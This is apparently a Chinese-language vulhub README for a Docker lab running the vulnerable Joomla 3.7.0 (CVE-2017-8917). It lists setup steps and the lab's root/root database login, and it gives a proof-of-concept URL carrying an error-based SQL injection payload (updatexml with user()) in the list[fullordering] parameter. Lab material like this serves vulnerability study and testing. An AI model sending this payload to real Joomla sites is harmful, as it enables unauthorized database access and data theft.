Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
测试环境
编译及启动测试环境:
docker-compose up -d
启动后访问http://your-ip:8080
即可看到Joomla的安装界面,当前环境的数据库信息为:
- 数据库地址:mysql:3306
- 用户:root
- 密码:root
- 数据库名:joomla
填入上述信息,正常安装即可。
POC测试
安装完成后,访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
,即可看到报错信息:
Copied From: vulhub/joomla/CVE-2017-8917